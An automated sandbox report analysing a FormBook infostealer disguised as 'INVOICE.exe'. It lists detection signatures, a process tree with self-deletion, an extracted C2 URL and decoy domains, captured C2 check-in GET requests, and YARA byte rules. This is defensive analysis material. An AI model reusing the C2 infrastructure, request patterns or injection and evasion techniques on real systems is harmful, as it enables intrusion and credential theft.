Analysis Report INVOICE.exe

Overview

General Information

Sample Name: INVOICE.exe
Analysis ID: 433143
MD5: 98901aff995d92677cf637b241ae9a9b
SHA1: 6dac1968c4a9ae4bf26f7fd38efb721fcf7d05dc
SHA256: fb6e849cd3af7e8b0c8143397e62a595a42abbfbbac81f2cdd0b2cb4d18ea543
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INVOICE.exe (PID: 6440 cmdline: 'C:\Users\user\Desktop\INVOICE.exe' MD5: 98901AFF995D92677CF637B241AE9A9B)
    • INVOICE.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\INVOICE.exe' MD5: 98901AFF995D92677CF637B241AE9A9B)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • systray.exe (PID: 2148 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
        • cmd.exe (PID: 2100 cmdline: /c del 'C:\Users\user\Desktop\INVOICE.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gicc-fx.com/uer0/"], "decoy": ["bonds101.com", "lyotrust.com", "can-amchainseurope.com", "mysoulcure.com", "hometownsmut.com", "cxpzhy.site", "hjklrmn.xyz", "bsdminingservice.com", "mockpacket.com", "standwithkam.com", "yxbdj.com", "soulseedz.com", "whxldjt.com", "ruayhunhangseng.com", "benefitcrystal.info", "rahalake.com", "cryptnex.com", "comicslighthouse.com", "ridenwithbiden.net", "samsunbilsem.com", "homestorestoragemanhattan.com", "33-today.club", "laurajimore.com", "wellnesswithshami.com", "palmyra-beaute.com", "ringerpinger.com", "cpf3life.com", "medusaantalya.com", "meganmccalla.com", "xn--2qux23coval6o.net", "icheaplivemall.com", "theseekers5thdimension.com", "hydrogenfunding.com", "calphad.cloud", "amazingdiapercakes.com", "11gongli.com", "bhuyanit.com", "16263937888.com", "crowgangrecords.com", "ytub.xyz", "virtual-ledlight.com", "dollysusmitha.com", "istanbulkonyasofrasi.com", "phonetomouth.com", "tiendasred.com", "destemidovapes.com", "quinnmonroe.com", "internationaldatingapps.com", "aib-confirm.com", "rentthemansion.com", "musicmysoul.com", "alpinesocks.net", "8425sentinaechasedrive.com", "danielabigalli.com", "atlasresearchus.com", "rossinkmobilenotary.com", "mynevve.com", "alfacapital.fund", "jumtix.xyz", "rr-program.com", "trumpoutnowhat.com", "motorworld.rentals", "condoproinsurance.com", "quantumkca.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory-dump entries are collapsed on the original page)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.INVOICE.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.INVOICE.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.INVOICE.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.1.INVOICE.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.INVOICE.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further unpacked-PE entries are collapsed on the original page)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.gicc-fx.com/uer0/"], "decoy": ["bonds101.com", "lyotrust.com", "can-amchainseurope.com", "mysoulcure.com", "hometownsmut.com", "cxpzhy.site", "hjklrmn.xyz", "bsdminingservice.com", "mockpacket.com", "standwithkam.com", "yxbdj.com", "soulseedz.com", "whxldjt.com", "ruayhunhangseng.com", "benefitcrystal.info", "rahalake.com", "cryptnex.com", "comicslighthouse.com", "ridenwithbiden.net", "samsunbilsem.com", "homestorestoragemanhattan.com", "33-today.club", "laurajimore.com", "wellnesswithshami.com", "palmyra-beaute.com", "ringerpinger.com", "cpf3life.com", "medusaantalya.com", "meganmccalla.com", "xn--2qux23coval6o.net", "icheaplivemall.com", "theseekers5thdimension.com", "hydrogenfunding.com", "calphad.cloud", "amazingdiapercakes.com", "11gongli.com", "bhuyanit.com", "16263937888.com", "crowgangrecords.com", "ytub.xyz", "virtual-ledlight.com", "dollysusmitha.com", "istanbulkonyasofrasi.com", "phonetomouth.com", "tiendasred.com", "destemidovapes.com", "quinnmonroe.com", "internationaldatingapps.com", "aib-confirm.com", "rentthemansion.com", "musicmysoul.com", "alpinesocks.net", "8425sentinaechasedrive.com", "danielabigalli.com", "atlasresearchus.com", "rossinkmobilenotary.com", "mynevve.com", "alfacapital.fund", "jumtix.xyz", "rr-program.com", "trumpoutnowhat.com", "motorworld.rentals", "condoproinsurance.com", "quantumkca.com"]}
Multi AV Scanner detection for submitted file
Source: INVOICE.exe | ReversingLabs: Detection: 65%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: INVOICE.exe | Joe Sandbox ML: detected
Source: 0.2.INVOICE.exe.9990000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.INVOICE.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.INVOICE.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.systray.exe.4ccf834.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.systray.exe.ac3748.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: INVOICE.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: systray.pdb source: INVOICE.exe, 00000001.00000002.275736052.00000000007D0000.00000040.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: INVOICE.exe, 00000001.00000002.275736052.00000000007D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: INVOICE.exe, 00000000.00000003.198125696.00000000099C0000.00000004.00000001.sdmp, INVOICE.exe, 00000001.00000002.275776991.0000000000A80000.00000040.00000001.sdmp, systray.exe, 00000008.00000002.463792021.00000000047A0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: INVOICE.exe, systray.exe
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_0040263E FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 104.21.29.70:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 104.21.29.70:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 104.21.29.70:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.gicc-fx.com/uer0/
Source: global traffic | HTTP traffic detected: GET /uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThz HTTP/1.1 Host: www.cpf3life.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEI HTTP/1.1 Host: www.phonetomouth.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown | DNS traffic detected: queries for: www.dollysusmitha.com
Source: explorer.exe, 00000003.00000000.218929879.00000000089F9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: INVOICE.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: INVOICE.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: INVOICE.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: INVOICE.exe
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041A050 NtClose,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041A100 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00419F20 NtCreateFile,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00419FD0 NtReadFile,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_0041A0FA NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00419F1A NtCreateFile,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00419FCC NtReadFile,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INVOICE.exe | Code function: 1_2_00AE9780 NtMapViewOfSection,LdrInitializeThunk,
